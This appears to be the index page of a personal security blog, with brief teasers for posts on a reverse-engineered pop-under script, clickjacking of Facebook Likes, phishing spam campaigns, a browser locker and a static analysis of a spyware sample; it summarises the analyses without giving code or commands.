Pop-under Javascript

Pop-unders are a special case of pop-up page that remains behind the active browser window, usually without the user's knowledge. These are commonly found on questionable websites and are used to push advertisements. With Coinhive mining scripts growing in popularity, a script that remains running in an open window without the user's knowledge could do real harm to his or her computer. This post discusses my process for reverse engineering and re-creating a commercial (if you can call paid pseudo-malware commercial) pop-under script and determining some mitigation techniques. As of the time of writing, this script is widely used and bypasses all of Chrome's popunder protections.

...read more

Clickjacking Facebook Likes

This post highlights a common click-jacking application: stealing Facebook likes. The Javascript and CSS used for the attack are extremely simple. Applying this technique to a Facebook "Like" button is relatively harmless and has been rendered somewhat obsolete by a confirmation dialog from Facebook. However, this technique can be used for much more malicious purposes.

...read more

Email Spam Malware

An on-going campaign that consists of fake Facebook, Gmail and Paypal notification emails. The emails follow a similar template, and always link to a PHP page with a simple redirect script that send the user to a malicious page. In a previous post I covered a browser locker. Recently, the emails have been linking to a fake Flash update site. I briefly analyzed the email, associated URLs, and the malicious sample obtained.

...read more

Browser Locker - Email Spam

Analysis of a spam campaign involving a fraudulent Facebook password reset request. Following the link in the email results in the user arriving at a browser locking page. A user who is not familiar with this type of malicious page may fall victim to a typical tech support scam. The malicious pages in this campaign are not sophisticated. If the user has not clicked anywhere on the page, they can simply navigate away. If they have, the page will become full screen, and it will require the use of keyboard shortcuts to open a task manager and terminate the browser process.

...read more

Spyware - Quick Malware Analysis

A quick static analysis of a RAT/Spyware sample. The sample contains nasty functionality including keyboard/mouse logging, webcam capture and network traffic monitoring. The sample was not executed. Basic dynamic analysis indicated that the malware would require a genuine internet connection, and my current lab environment is designed to use an isolated network served by InetSIM. It may be necessary to execute this malware to more easily determine network based indicators. As discussed below, there are many indications that the malware will communicate with an external IP address, but it appears that this address(es) or URLs are decrypted at runtime.

...read more

Get honeypotted? I like spam. Contact Us Contact Us Email Email ar.hp@outlook.com email: ar.hp@outlook.com